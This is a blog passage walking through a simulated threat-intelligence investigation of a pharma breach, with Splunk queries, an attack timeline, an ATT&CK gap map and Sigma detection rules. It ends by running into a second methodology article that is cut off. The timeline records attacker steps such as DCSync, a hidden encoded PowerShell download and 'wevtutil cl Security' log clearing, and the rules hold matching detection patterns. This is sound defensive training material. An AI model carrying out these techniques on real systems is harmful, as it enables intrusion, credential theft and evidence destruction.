evidence:/opt/splunk/bin/splunk add oneshot sysmon/WS-CFO-01-sysmon.jsonl \ -sourcetype sysmon_json -index endpoint -host WS-CFO-01/opt/splunk/bin/splunk add oneshot windows-security/DC01-security.jsonl \ -sourcetype wineventlog -index wineventlog -host DC01/opt/splunk/bin/splunk add oneshot windows-security/SERVER-RD-02-security.jsonl \ -sourcetype wineventlog -index wineventlog -host SERVER-RD-02/opt/splunk/bin/splunk add oneshot palo-alto/ngfw-flows.csv \ -sourcetype pan:traffic -index firewall -host pa-3260/opt/splunk/bin/splunk add oneshot palo-alto/dns-queries.csv \ -sourcetype pan:dns -index firewall -host pa-3260/opt/splunk/bin/splunk add oneshot sql-audit/SERVER-RD-02-sql-audit.jsonl \ -sourcetype mssql_audit -index database -host SERVER-RD-02Query 1 — triage: C2 IPs across all indexes:index=* (203.0.113.87 OR 198.51.100.44) earliest=-30d| stats count by host, sourcetype, index| sort -countQuery 2 — DCSync from non-DC (DET-002 validation):index=wineventlog EventCode=4662 ObjectType="{19195a5b-6da0-11d0-afd3-00c04fd930c9}"| where NOT match(IpAddress, "^10\.10\.1\.(10|11)$")| table _time, host, SubjectUserName, IpAddress, ObjectName, PropertiesQuery 3 — service account off-hours (DET-003 validation):index=wineventlog EventCode=4624 LogonType=3 TargetUserName=svc_backup| eval hour=strftime(_time, "%H")| where hour < 6 OR hour > 22| table _time, host, TargetUserName, IpAddress | sort _timeQuery 4 — exfil scope:index=wineventlog EventCode=4663 ObjectName="*USPartner2024*"| stats count as files_accessed, min(_time) as first, max(_time) as last by SubjectUserName, hostQuery 5 — full 24-day timeline:index=* earliest=2024-10-22 latest=2024-11-16 (host=WS-IT-LEVI OR host=WS-CFO-01 OR host=SERVER-RD-02 OR host=DC01)| eval summary=coalesce(Message, Statement, query, CommandLine, "event")| table _time, host, sourcetype, summary | sort _timeFound IOCsIP 203.0.113.87 — SIEM-validated; C2 traffic confirmed across endpoint and network indexesIP 198.51.100.44 — SIEM-validated; exfil traffic confirmed across endpoint and network indexesAccount svc_backup — DET-002: DCSync from 10.10.3.22 (non-DC); DET-003: off-hours logonFile pattern USPartner2024* (47 files) — DET-004: bulk access by svc_backup on SERVER-RD-02Indicator Off-hours logon — EID 4624 / LogonType 3 outside 06:00–22:00 windowCommit all analysis artifactsgit add 03-analysis/git commit -m "PROJ-2024-001: evidence analysis — VS Code investigation complete; REST Client queries, RBQL, binary hex analysis, DCSync confirmed, exfil 381MB corroborated in 3 sources"The timeline in Step R2 is now fully supported. Every event in the table has a source log opened in VS Code, a query or search that confirmed it, and a REST Client or terminal command a third party can replay independently.Step R2: Timeline — Two Paths, One Actor1. Open the timeline filenano 03-analysis/timeline/timeline.mdThe template has a header block and a markdown table. Fill the header first:Project: PROJ-2024-001Analyst: [your name]Last updated: 2024-11-15Time range: 2024-10-18 – 2024-11-15Evidence label key: CONFIRMED / CORROBORATED / INFERRED / HYPOTHESIZED / GAPThen add one row per event. Every row needs: timestamp (UTC), host, what happened, which log source you saw it in, an evidence label, and the ATT&CK technique. If you do not have a technique yet, leave it blank and come back — do not skip the label.2. Add events in chronological orderThe timeline reveals what the CFO alert obscured: the breach started 24 days earlier through a completely different person.2024–10–18 — Externallifetechpharma-corp[.]eu registered as a typosquat domain.Source: OSINTLabel: CONFIRMEDATT&CK: T1583.001Notes: Pre-attack infrastructure preparation.2024–10–22 11:23 — ExchangePhishing email sent to p.levi: “MFA Re-enrollment Required” with AiTM HTML attachment.Source: M365 ATPLabel: CONFIRMEDATT&CK: T1566.001Notes: ATP SCL=4, delivered; threshold was 5.2024–10–22 11:31 — WS-IT-LEVIUnknown activity — GAP-001 begins.Source: — Label: GAPATT&CK: — Notes: Sysmon forwarder stopped.2024–10–24 02:17 — Azure AD + VPNVPN login as p.levi from Istanbul, Turkey, using hosting/VPS ASN. No MFA challenge recorded. Session lasted 1h 12min.Source: Azure AD sign-inLabel: CONFIRMEDATT&CK: T1557, T1133Notes: 4:17 AM local time; Paz Levi lives in Rehovot.2024–10–24 02:19 — DC01EID 4624: network logon for svc_backup from WS-IT-LEVI / 10.10.3.22. Service account used outside business hours.Source: Windows Security / SplunkLabel: CONFIRMEDATT&CK: T1078.002Notes: svc_backup has Domain Admin rights.2024–10–25 03:41 — SERVER-FIN-01svc_backup accessed \\SERVER-FIN-01\\FinanceReports\\2024\\.Source: File share audit, partialLabel: CORROBORATEDATT&CK: T1039Notes: Log incomplete — access timestamp only, not filenames.2024–11–01 09:14 — WS-IT-LEVIGAP-001 ends. First DNS query to telemetry-cdn-services[.]biz resolving to 203.0.113.87. First C2 beacon from this host.Source: Palo Alto DNSLabel: CONFIRMEDATT&CK: T1071.001Notes: Sysmon service and forwarder restarted at the same time — probable anti-forensics.2024–11–01 09:18 — SERVER-RD-02EID 4624: svc_backup SMB Type 3 logon from WS-IT-LEVI.Source: Windows SecurityLabel: CONFIRMEDATT&CK: T1021.002Notes: Occurred four minutes after C2 reconnection.2024–11–06 02:09 — SERVER-RD-02EID 4624: svc_backup SMB logon from WS-IT-LEVI.Source: Windows SecurityLabel: CONFIRMEDATT&CK: T1021.002Notes: Off-hours access.2024–11–06 02:10–02:14 — SERVER-RD-02EID 4663 ×47: svc_backup accessed all 47 files in \\USPartner2024\\. Read activity occurred and modified timestamps were updated.Source: Windows SecurityLabel: CONFIRMEDATT&CK: T1039Notes: Each file was individually accessed; timestamp modification suggests deliberate metadata manipulation.2024–11–06 02:14 — SERVER-RD-02EID 5156: outbound HTTPS from SERVER-RD-02 to external IP over port 443 during the file access window.Source: Windows Security + firewallLabel: CONFIRMEDATT&CK: T1041Notes: Destination IP confirmed in Palo Alto NGFW log: 198.51.100.44; separate C2 from primary.2024–11–06 02:48 — DC01EID 4662: svc_backup requested DS-Replication-Get-Changes on DC01.Source: Windows SecurityLabel: CONFIRMEDATT&CK: T1003.006Notes: DCSync indicator. Pentest scope did not include DCSync. Pentest VLAN is 10.10.99.0/24; this event came from 10.10.3.22.2024–11–15 17:58 — ExchangePhishing email sent to m.cohen, the CFO: “Q4-2024 Licensing Agreement” with .xlsm attachment. SPF, DKIM, and DMARC all failed.Source: M365 Message TraceLabel: CONFIRMEDATT&CK: T1566.001Notes: Second entry point — 24 days after the first.2024–11–15 18:42 — WS-CFO-01Outlook spawned PowerShell with -NonI -W Hidden -Enc, downloading a second-stage payload from 203.0.113.87.Source: CrowdStrike + Sysmon EID 1Label: CONFIRMEDATT&CK: T1059.001Notes: Triggering alert.2024–11–15 18:46–20:52 — WS-CFO-01LSASS memory access observed via Sysmon EID 10 with GrantedAccess 0x1010. Persistence added via Registry Run Key and scheduled task. BITS downloaded a second-stage binary.Source: Sysmon EID 10/11/13, EID 4698Label: CONFIRMEDATT&CK: T1003.001, T1547.001, T1053.005, T1197Notes: svchost32.exe dropped to AppData\\Roaming.2024–11–15 20:52 — SERVER-FIN-01WMI lateral movement observed: WmiPrvSE spawned PowerShell with -Enc and a different base64 payload.Source: CrowdStrikeLabel: CONFIRMEDATT&CK: T1021.003, T1059.001Notes: svc_finreport credentials used.2024–11–15 21:01 — SERVER-FIN-01Finance data staged: FR_2024_consolidated.zip created in C:\\Windows\\Temp\\.Source: CrowdStrike EID 11Label: CONFIRMEDATT&CK: T1039, T1560Notes: 2.8 MB upload confirmed in firewall logs at 21:14.2024–11–15 21:14 — WS-CFO-01wevtutil.exe cl Security executed, partially clearing the Windows Security log.Source: CrowdStrikeLabel: CONFIRMEDATT&CK: T1070.001Notes: Sysmon log remained intact because it was protected.The evidence label system matters here. Event 12 (DCSync) is CONFIRMED — it exists in DC01’s Windows Security log, forwarded to Splunk, from an IP that is definitively WS-IT-LEVI and definitively not the pentest VLAN. That cannot be waved away as “possible pentest activity.” Event 6 (finance server access) is CORROBORATED — single source with incomplete log — and can only appear in the technical report with an explicit qualifier, not in the executive brief as a stated fact.3. Save and commitgit add 03-analysis/timeline/timeline.mdgit commit -m "PROJ-2024-001: timeline — 18 events Oct 18–Nov 15, dual-path confirmed, GAP-001 bounds established"Step R3: Claims Ledger — Every Assertion Traced to Evidence1. Open the claims ledgernano 03-analysis/claims/claims-ledger.mdThe template has a table with six columns: ID, Claim, Evidence, Confidence, Competing Hypotheses, PIR. Start with an empty row for each major assertion you identified in the timeline — then fill each one completely before moving to the next.For each row, answer these five questions before typing a word:What is the exact assertion? (One sentence, falsifiable — could in principle be proven false)Which file and line number is the evidence in? (Not “we saw in Splunk” — the actual log reference)What confidence level and why? (High / Medium / Low / Insufficient — with explicit rationale)What alternative explanations were considered — and why were they ruled out or left open?Which PIR does this answer?If you cannot answer question 4, the claim is not ready to write. Think first.2. Fill in one claim per confirmed technique or PIR answerThe claims ledger converts the timeline into auditable, falsifiable assertions. Each claim answers five questions: what, evidence, confidence, competing hypotheses, which PIR.CL-001 — Initial access via AiTM phishing against IT admin p.leviClaim: Initial access was via AiTM phishing against IT admin p.levi on October 22, 2024.Evidence: M365 ATP log shows AiTM HTML lure delivered at 11:23 and opened at 11:31. VPN login from Istanbul occurred at 02:17 on October 24 with no MFA challenge, indicating likely stolen session token replay.Confidence: HighCompeting Hypotheses: Credential purchase or insider activity cannot be fully ruled out without WS-IT-LEVI disk forensics, which is blocked by legal hold. However, the AiTM lure plus token replay pattern is more parsimonious.PIR: PIR-002CL-002 — Use of svc_backup Domain Admin credentials to access formula filesClaim: The adversary used svc_backup Domain Admin credentials to access SERVER-RD-02 and the formula files.Evidence: EID 4624 on SERVER-RD-02 shows svc_backup Type 3 logon from WS-IT-LEVI. EID 4663 occurred 47 times on formula files.Confidence: HighCompeting Hypotheses: Legitimate backup operation is ruled out because backup jobs run from SERVER-WSUS-01 / 10.10.4.x, not from WS-IT-LEVI. The timestamp, 02:09 UTC, is outside the maintenance window.PIR: PIR-002CL-003 — Exfiltration of 47 formula files on November 6, 2024Claim: The 47 formula files in USPartner2024 were exfiltrated on November 6, 2024.Evidence: EID 4663 occurred 47 times, showing file access. EID 5156 shows outbound HTTPS from SERVER-RD-02 at the same time. Palo Alto NGFW flow shows 10.10.2.15 → 198.51.100.44:443, with 381 MB outbound between 02:14 and 02:19 UTC.Confidence: HighCompeting Hypotheses: File access for indexing or backup is ruled out because no backup job ran at this time. The 381 MB outbound volume matches the compressed formula package. The destination IP is not in the allowlist and resolves to a VPS hosting provider.PIR: PIR-001 — ANSWERED: YESCL-004 — DCSync executed via svc_backup on November 6Claim: DCSync was executed via svc_backup Domain Admin rights on November 6 at 02:48 UTC.Evidence: DC01 EID 4662 shows DS-Replication-Get-Changes GUID from 10.10.3.22, which is WS-IT-LEVI. The subject username was svc_backup.Confidence: HighCompeting Hypotheses: Legitimate AD replication is ruled out because the event originated from a workstation IP, not a domain controller. Authorized pentest scope explicitly excluded DCSync and used only 10.10.99.x IPs.PIR: PIR-003CL-005 — CFO path and IT admin path are same threat actorClaim: Path A, involving the CFO on November 15, and Path B, involving the IT admin on October 22, are attributable to the same threat actor.Evidence: Both svchost32.exe and UpdateHelper.dll share the same fake PE compile timestamp: 2018-04-09. The secondary C2 sys-update-cdn[.]net was hard-coded in the CFO implant and also used in SERVER-RD-02 DNS activity.Confidence: HighCompeting Hypotheses: Coincidence would require two separate actors to target the same organization at the same time using a near-identical toolchain. This is extremely implausible.PIR: PIR-002CL-006 — Full domain compromise via DCSyncClaim: The adversary achieved full domain compromise via DCSync. All Active Directory credentials must be treated as compromised.Evidence: CL-004 confirms DCSync activity. svc_backup held Domain Admin rights. DCSync requests included krbtgt and privileged account hashes.Confidence: HighCompeting Hypotheses: DCSync may have been partial or failed, but this cannot be confirmed without full DC01 log access. Treating the environment as fully compromised is the conservative and operationally correct response until disproven.PIR: PIR-003CL-003 is the pivotal claim. The US partner’s formulas are gone. That drives the PIR-001 answer and the entire notification timeline. CL-004 and CL-006 change the scope of remediation from “contain these three hosts” to “rotate all AD credentials, treat all 80 servers as potentially compromised.”3. Update project.yml PIR statusWhen a PIR is answered, open project.yml and change the status field immediately:nano project.ymlChange:- id: PIR-001 status: openTo:- id: PIR-001 status: answered # CL-003 — exfiltration confirmed, 381 MB, Nov 64. Commit the claims ledgergit add 03-analysis/claims/claims-ledger.md project.ymlgit commit -m "PROJ-2024-001: claims — 6 claims; PIR-001 ANSWERED YES (CL-003 exfil confirmed); PIR-003 CONFIRMED ONGOING (CL-006 DCSync)"Step R4: ATT&CK Mapping — Where Detection Failed1. Open the ATT&CK mapping filenano 03-analysis/attck-mapping/attck-mapping.mdFor each technique you identified in the timeline, add one row. The four columns that matter most operationally are: Confidence (how sure are you the technique was used), Rule Fired? (yes/no/partial — check your SIEM), and Gap Type (what kind of work is needed to close this detection hole).Gap types: Rule missing / Data source missing / Coverage incomplete / Architectural gap. Pick one. If you are unsure, write your best guess and flag it for SOC review.Also update project.yml — fill the attck_techniques list:nano project.ymlscope: attck_techniques: - T1566.001 - T1557 - T1133 - T1078.002 - T1059.001 - T1003.001 - T1003.006 - T1021.003 - T1197 - T1047 - T1070.001 - T1547.0012. Fill one row per techniqueT1566.001 — Phishing attachment, CFO .xlsmEvidence: M365 ATP logConfidence: HighRule Fired?: Partial — ATP delivered; SCL=4, threshold=5Gap Type: Coverage incomplete — SCL threshold tuningT1557 — AiTM credential theft, IT adminEvidence: VPN login pattern + AiTM HTML lureConfidence: HighRule Fired?: NoGap Type: Rule missing — no AiTM session token detectionT1133 — VPN access with stolen credentialsEvidence: VPN log: Istanbul, off-hours, no prior historyConfidence: HighRule Fired?: NoGap Type: Rule missing — no anomalous VPN authentication alertT1078.002 — Valid account abuse, svc_backupEvidence: EID 4624, multiple eventsConfidence: HighRule Fired?: NoGap Type: Rule missing — service account off-hours logon undetectedT1059.001 — Encoded PowerShell, both hostsEvidence: Sysmon EID 1, CrowdStrikeConfidence: HighRule Fired?: Yes, CFO only, via CrowdStrike behavioral detectionGap Type: Coverage incomplete — CFO only; IT admin host fired no alertT1003.001 — LSASS memory accessEvidence: Sysmon EID 10, GrantedAccess 0x1010Confidence: HighRule Fired?: NoGap Type: Rule missing — Sysmon EID 10 not alerted onT1003.006 — DCSyncEvidence: DC01 EID 4662Confidence: HighRule Fired?: NoGap Type: Rule missing — EID 4662 audit configured but no alert ruleT1021.003 — WMI lateral movement to SERVER-FIN-01Evidence: CrowdStrike: WmiPrvSE → PowerShellConfidence: HighRule Fired?: NoGap Type: Rule missing — WmiPrvSE parent alert not deployedT1197 — BITS download, second stageEvidence: Sysmon EID 1, bitsadminConfidence: HighRule Fired?: NoGap Type: Rule missing — BITS external download not monitoredT1047 — WMI execution, lateral movementEvidence: CrowdStrike logConfidence: HighRule Fired?: NoGap Type: Data source missing — WMI logging not in SIEMT1070.001 — Event log clearedEvidence: CrowdStrike EID 1102Confidence: HighRule Fired?: NoGap Type: Rule missing — wevtutil alert not deployedT1547.001 — Registry Run Key persistenceEvidence: Sysmon EID 13Confidence: HighRule Fired?: NoGap Type: Coverage incomplete — EID 13 ingested but no alert rule on AppData\\Roaming pathsThe gap taxonomy tells the engineering team exactly what work is required:Rule missing (7 techniques): Data is in SIEM. A detection engineer can write and deploy the rule. These are sprint items.Coverage incomplete (3 techniques): Rule or data exists but is mis-tuned or partial. These require tuning, not new infrastructure.Data source missing (1 technique): WMI execution logging is not in the SIEM. This requires an infrastructure change before rules can be written.The DCSync gap (T1003.006) is particularly stark: the Advanced Audit Policy that generates EID 4662 was correctly configured on DC01, the event was forwarded to Splunk, and the event was visible in Splunk. There was no alert rule. A single Splunk search rule on source=WinEventLog:Security EventCode=4662 ObjectType="{19195a5b-6da0-11d0-afd3-00c04fd930c9}" from a non-DC IP would have fired and contained this incident before the formula exfiltration.3. Commit the ATT&CK mappinggit add 03-analysis/attck-mapping/attck-mapping.md project.ymlgit commit -m "PROJ-2024-001: ATT&CK mapping — 12 techniques, 7 rule-missing, 3 coverage-incomplete, 1 data-source-missing, 1 arch-gap"Step R5: Attribution Assessment — Same Actor or Two?1. Open the attribution filenano 03-analysis/attribution/attribution.mdWrite attribution only after the claims ledger is complete. The attribution file has three sections: evidence for unification (or separation), confidence ladder scoring, and the exact language to use in deliverables. Fill them in that order.Do not start with a hypothesis. Start with the evidence you have from the claims ledger, then see where it points.2. Score the evidence against the confidence ladderThe investigation faces a key analytical question: Path A (CFO phishing, November 15) and Path B (IT admin AiTM, October 22) — are they the same actor?Evidence for unification (same actor):Shared PE compile timestamp: Both dropped binaries — svchost32.exe (CFO host) and UpdateHelper.dll (IT admin host) — carry an identical fake compile timestamp of 2018-04-09. This is a known toolchain fingerprint. The probability of two unrelated actors both timestomping to the same date is extremely low.Shared secondary C2 domain in memory: Strings extracted from svchost32.exe include sys-update-cdn[.]net — the domain that appeared only in SERVER-RD-02's DNS logs during the formula exfiltration. The CFO's implant knew about infrastructure used during the Path B operation. This is only explicable if the same actor controlled both implants.Coordinated operations timeline: The CFO was targeted on the same day that the finance server data was being staged on SERVER-FIN-01 via lateral movement from the IT admin path. Two independent actors staging finance data simultaneously at the same target is implausible.Assessment: Single threat actor, dual delivery mechanism.The actor compromised the IT admin first (October 22), used that access for data theft (November 6), then independently targeted the CFO to expand access to finance data. The two phishing lures used different delivery infrastructure (different sender domains, different sending IPs from the same /24 block) — consistent with an actor who maintains parallel operational tracks.Attribution confidence: Medium-High. Apply the confidence ladder from Step R5 of the methodology to score this case:Ladder tier: Medium-High — TTP overlap + infrastructure match present; independent confirmation absent. The toolset has not been definitively matched to a named cluster, which prevents elevation to High.What to write: “Activity assessed as a single threat actor based on shared toolchain indicators (PE timestamp, secondary C2 domain). Tradecraft and targeting profile are consistent with Iranian-nexus industrial espionage operations targeting Israeli pharmaceutical IP. Attribution to a named cluster is not warranted without CERT-IL deconfliction or independent confirmation. Confidence: Medium-High.”3. Paste the final language into attribution.md and commitgit add 03-analysis/attribution/attribution.mdgit commit -m "PROJ-2024-001: attribution — single actor, Medium-High confidence, shared PE timestamp + secondary C2, Iranian-nexus tradecraft consistent"Step R6: Detection Rules — Four That Would Have Changed the Outcome1. Create one file per ruleEach rule gets its own file in 04-detections/sigma/:cp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-001-anomalous-vpn-auth.ymlcp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-002-dcsync-non-dc.ymlcp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-003-svc-account-offhours.ymlcp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-004-wmiprvse-powershell.ymlOpen the first one:nano 04-detections/sigma/DET-001-anomalous-vpn-auth.ymlEvery rule must reference the CL-ID it would have detected and the gap type it closes. That is how the detection backlog stays traceable to the investigation.2. Fill each ruleEach rule is written with a reference to the claim it would have detected and the evidence gap it closes.DET-001: Anomalous VPN Authentication from Non-Corporate Sourcetitle: Anomalous VPN Authentication — New Geography or Hosting ASNid: a1b2c3d4-5678-9abc-def0-1234567890abstatus: experimentaldescription: > Detects VPN authentication success from a source IP with no prior history for this user, specifically from IPs geolocated outside Israel or from hosting/VPN ASNs. Covers T1133 and T1557 (session token replay after AiTM interception). Derived from PROJ-001 — CL-001, p.levi VPN from Istanbul at 02:17 UTC.logsource: category: network product: cisco_anyconnectdetection: selection: event.action: vpn_auth_success user.name|exists: true filter_known: source.geo.country_iso_code: 'IL' source.as.number|not|startswith: ['AS47583', 'AS16276'] # hosting VPS ASNs condition: selection and not filter_knownfalsepositives: - Legitimate international travel — validate against HR travel records - Remote contractors working abroadlevel: hightags: - attack.initial_access - attack.t1133 - attack.credential_access - attack.t1557DET-002: DCSync Attack Detectiontitle: DCSync Attack via Non-DC Accountid: b2c3d4e5-6789-abcd-ef01-234567890abcstatus: productiondescription: > Detects DCSync by looking for EID 4662 with the DS-Replication-Get-Changes GUID originating from a workstation IP rather than a domain controller. Derived from PROJ-001 — CL-004: svc_backup performed DCSync from WS-IT-LEVI using Domain Admin rights that were never revoked after an August 2024 emergency backup restoration.logsource: category: windows product: windows service: securitydetection: selection: EventID: 4662 ObjectType: '{19195a5b-6da0-11d0-afd3-00c04fd930c9}' # DS-Replication-Get-Changes Properties|contains: - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' # DS-Replication-Get-Changes-All - '89e95b76-444d-4c62-991a-0facbeda640c' # DS-Replication-Get-Changes-In-Filtered-Set filter_legitimate_dc: IpAddress|startswith: - '10.10.1.10' # DC01 — add all DC IPs here - '10.10.1.11' # DC02 condition: selection and not filter_legitimate_dcfalsepositives: - Azure AD Connect sync account — must be explicitly whitelisted - Authorized red team / pentest — validate scope before dismissinglevel: criticaltags: - attack.credential_access - attack.t1003.006DET-003: Service Account Off-Hours Authenticationtitle: Service Account Authentication Outside Business Hoursid: c3d4e5f6-789a-bcde-f012-34567890abcdstatus: experimentaldescription: > Detects authentication by a service account (accounts matching svc_* naming pattern) outside business hours (22:00–06:00) to a non-designated system. Covers T1078.002 (Valid Accounts: Domain Accounts) for svc_backup lateral movement in PROJ-001.logsource: category: windows product: windows service: securitydetection: selection: EventID: 4624 LogonType: 3 SubjectUserName|startswith: 'svc_' filter_business_hours: TimeCreated|windash|lt: '22:00:00' TimeCreated|windash|gt: '06:00:00' filter_known_backup_host: IpAddress: '10.10.4.15' # SERVER-WSUS-01 — legitimate backup source condition: selection and not filter_business_hours and not filter_known_backup_hostfalsepositives: - Scheduled tasks that legitimately run at night — review and whitelist specific pairslevel: mediumtags: - attack.lateral_movement - attack.t1078.002DET-004: WmiPrvSE Spawning PowerShelltitle: WMI Remote Execution — PowerShell Child of WmiPrvSEid: d4e5f6a7-89ab-cdef-0123-4567890abcdestatus: productiondescription: > Detects WMI-based lateral movement (T1021.003) where WmiPrvSE.exe spawns PowerShell on a remote system. This is the pattern from PROJ-001 step 16: lateral movement from WS-CFO-01 to SERVER-FIN-01 via WMI using svc_finreport credentials. CrowdStrike detected the PowerShell on SERVER-FIN-01 but the originating WMI connection from the CFO host had no coverage.logsource: category: process_creation product: windowsdetection: selection: ParentImage|endswith: '\WmiPrvSE.exe' Image|endswith: '\powershell.exe' suspicious_flags: CommandLine|contains: - '-Enc' - '-EncodedCommand' - '-NonI' - '-W Hidden' condition: selection and suspicious_flagsfalsepositives: - SCCM WMI-based software deployment with PowerShell post-install scriptslevel: hightags: - attack.lateral_movement - attack.execution - attack.t1021.003 - attack.t1059.001Validation: All four rules were validated against the PROJ-001 evidence set using Hayabusa before deployment. DET-001 fires on the October 24 Istanbul VPN login. DET-002 fires on the November 6 DCSync event. DET-003 fires on every svc_backup off-hours logon. DET-004 fires on the SERVER-FIN-01 WMI execution.3. Validate each rule against your evidence set# Run Hayabusa against the collected logs to confirm rules fire on known-bad eventshayabusa csv-timeline -d 01-evidence/ -r 04-detections/sigma/ -o validation-results.csvReview the output. A rule that does not fire on its own evidence set should not be deployed.4. Update project.yml deliverables count and commitnano project.ymldeliverables: - type: sigma-rules count: 4 status: completegit add 04-detections/sigma/ project.ymlgit commit -m "PROJ-2024-001: detections — DET-001 to DET-004 written and validated PASS against evidence set via Hayabusa"Step R7: Deliverables — What Each Stakeholder Gets1. Open the deliverable templatesnano 05-deliverables/executive-brief.mdnano 05-deliverables/soc-handoff.mdThe executive brief answers three questions only: what happened, what was confirmed stolen or compromised, and what must happen in the next 24 hours. One page. No technical jargon. Every PIR that is answered gets a one-line answer at the top.The SOC handoff lists: current IOCs (with confidence ratings), detection rules deployed, hunting queries still open, and escalation criteria. The SOC receives this, not the executive brief.2. Fill the executive briefExecutive brief (1 page, TLP:AMBER) — what the CISO needs in 90 minutes:An adversary assessed as Iranian-nexus compromised LifeTech Pharma through two separate phishing attacks over 24 days. Using stolen IT administrator credentials, they accessed and exfiltrated the 47-file US licensing formula package on November 6, 2024. They also performed a DCSync attack on the domain controller, which means all Active Directory credentials must be treated as compromised.PIR-001 ANSWERED: The US partner formula package was exfiltrated. 381 MB outbound confirmed in firewall logs.PIR-003 ANSWERED: Active compromise ongoing. The CFO alert on November 15 is a second wave from the same actor, still active at time of investigation.Immediate actions: Full AD credential rotation; quarantine WS-CFO-01 and SERVER-FIN-01; notify INCD (72h clock from discovery: expires November 17 02:14 IST); brief the US licensing partner.SOC handoff (technical):Current IOCs: 203.0.113.87, 198.51.100.44, telemetry-cdn-services[.]biz, sys-update-cdn[.]net, uslifepartner-group[.]com, lifetechpharma-corp[.]eu.Four detection rules deployed (DET-001 through DET-004). Two hunting queries: (1) pivot on C2 domains across all 838 endpoints — the 3 confirmed hosts may not be all; (2) hunt for any svc_backup authentication from non-WSUS IPs in the past 30 days.3. Update project.yml status to closed and commit everythingnano project.ymlproject: status: closedpirs: - id: PIR-001 status: answered # CL-003 - id: PIR-002 status: answered # CL-001 - id: PIR-003 status: answered # CL-006 - ongoing, AD rotation requiredgit add 05-deliverables/ project.ymlgit commit -m "PROJ-2024-001: deliverables — executive brief, SOC handoff, INCD notification ready; all PIRs answered; project closed"The Git History: What a Completed Investigation Looks Likeb9a2f1c PROJ-001: deliverables — executive brief, SOC handoff, INCD notification ready7c8d3e4 PROJ-001: detections — DET-001 through DET-004 validated PASS via Hayabusa5f2a9b1 PROJ-001: attribution — single actor assessed (shared PE timestamp + secondary C2)3e4c7d8 PROJ-001: ATT&CK mapping — 12 techniques, 7 rule-missing, 3 incomplete, 1 data-missing1b6f2a5 PROJ-001: claims — 6 claims; PIR-001 ANSWERED YES (CL-003); PIR-003 CONFIRMED ONGOING (CL-006)9a3e7c2 PROJ-001: timeline — 18 events Oct 22–Nov 15; dual-path confirmed, same actor assessed6f1b4d9 PROJ-001: evidence inventory — 6 sources, GAP-001 documented, firewall log retrieval urgent2c8a5e3 PROJ-001: scope — signed off 22:55 IST; PIR-001/002/003, TLP AMBER, legal hold WS-IT-LEVIa1d7f4b PROJ-001: intake — CFO PowerShell alert, legal hold WS-IT-LEVI, formula data in scope0e9c2b7 PROJ-001: scaffold initializedEach commit is a phase. Each message states the project ID, the phase, and a one-line summary of what was concluded. When a lawyer asks six months from now “what did you know and when did you know it?” — the git log answers.Key LessonsThe alert was not the beginning. The SOC received its first signal 52 hours after the breach was already in progress — and 15 days after the formula files were gone. The triggering alert was the second entry point. A detection rule on anomalous VPN authentication (DET-001) would have fired on October 24 at 02:17 UTC — before any lateral movement, before any data access.Gaps are findings, not absences. The 10-day Sysmon gap on WS-IT-LEVI coincided exactly with the delivery of a phishing email. Stopping a logging service is T1562.001 — Impair Defenses. A gap is not “we don’t know what happened.” A gap that coincides with a malicious delivery is evidence of anti-forensics.DCSync changes everything. The scope of remediation is not “three infected hosts.” When DCSync is confirmed via Domain Admin rights, every credential in the AD is potentially compromised. The scope is all 80 servers. The IR Lead needs to know this before the 90-minute CISO brief, not after.Claims need competing hypotheses. CL-003 (exfiltration confirmed) is only defensible as “high confidence” because specific alternative explanations were checked and explicitly ruled out — scheduled backup (wrong source IP, wrong timing), authorized developer activity (no jobs scheduled). Without the competing hypothesis analysis, a claim is an assertion. With it, it is analysis.This scenario is training assignment A01 from the CTI as a Code repository. The full evidence set, template, and worked solution are available there.Follow My WorkI publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.Portfolio / Knowledge Base: https://anpa1200.github.io/Medium: https://medium.com/@1200kmGitHub: https://github.com/anpa1200LinkedIn: https://www.linkedin.com/in/andrey-pautov/Andrey PautovCTI as a Code in Practice: Reactive Investigation — LifeTech Pharma was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

CTI as a Code: Complete Step-by-Step Methodology

Mon, 08 Jun 2026 06:30:49 +0200

Version-controlled threat intelligence — from first call to deployed Sigma rule.Why This Methodology ExistsMost CTI work degrades in three predictable ways:The evidence problem. An analyst writes “the adversary used T1078” in a report. Six months later nobody can answer: what log line supports that claim? Was it confirmed or inferred? What alternative hypotheses were ruled out? The claim exists in a PDF but the reasoning is gone.The detection problem. A detection rule gets written after an incident. It sits in the SIEM with no documentation of which adversary technique it covers, which evidence motivated it, or whether it was ever validated. When the technique evolves, nobody knows which rules to update.The institutional knowledge problem. The analyst who ran the investigation leaves. The entire understanding of what happened, how it was analyzed, and what was decided goes with them. The next incident starts from zero.CTI as a Code solves all three. Every claim traces to evidence. Every detection traces to a technique. Every decision is a git commit. The investigation is reproducible by anyone with access to the repository.ContentsWhy This Methodology ExistsThe Four Operational ModesSetup: Get the Repository and Start the LabStep 1: Initial Information Gathering — Ask Before You LookStep 2: Create Your Project Folder from the TemplateStep 3: Scope the ProjectReactive ModeStep R1: Collect and Inventory EvidenceStep R2: Build the Timeline with Evidence LabelsStep R3: Claims LedgerStep R4: ATT&CK Mapping with Gap ClassificationStep R5: Attribution AssessmentStep R6: Derive Sigma Rules for Every Missed TechniqueStep R7: Produce DeliverablesProactive ModeStep P1: Copy the TemplateStep P2: Run the IntakeStep P3: Assess Trigger IntelligenceStep P4: Crown Jewels AnalysisStep P5: Model Attack ScenariosStep P6: Build the Detection BacklogFull Cycle Mode: Building a CTI ProgramAdversary Emulation Mode: Validating CoverageGit Discipline — The Same for All ModesMinimum-Viable Path: No Lab RequiredThe EcosystemWhere to StartThe Four Operational ModesBefore picking up a tool, identify which mode you are in:The four modes share the same scaffold, the same analytical discipline, and the same git workflow. The difference is which steps you run and in what order.Setup: Get the Repository and Start the LabClone the repositorygit clone https://github.com/anpa1200/CTI_as_a_Code.gitcd CTI_as_a_CodeRepository structure:CTI_as_a_Code/├── docker-compose.yml ← full lab stack (OpenCTI, TheHive, Elastic, Cortex)├── .env.example ← all secrets in one place; copy to .env before starting├── scripts/│ ├── setup.sh ← first-time initialization (connectors, indexes, users)│ └── health-check.sh ← confirms all services return HTTP 200├── templates/ ← blank investigation scaffolds — copy these to 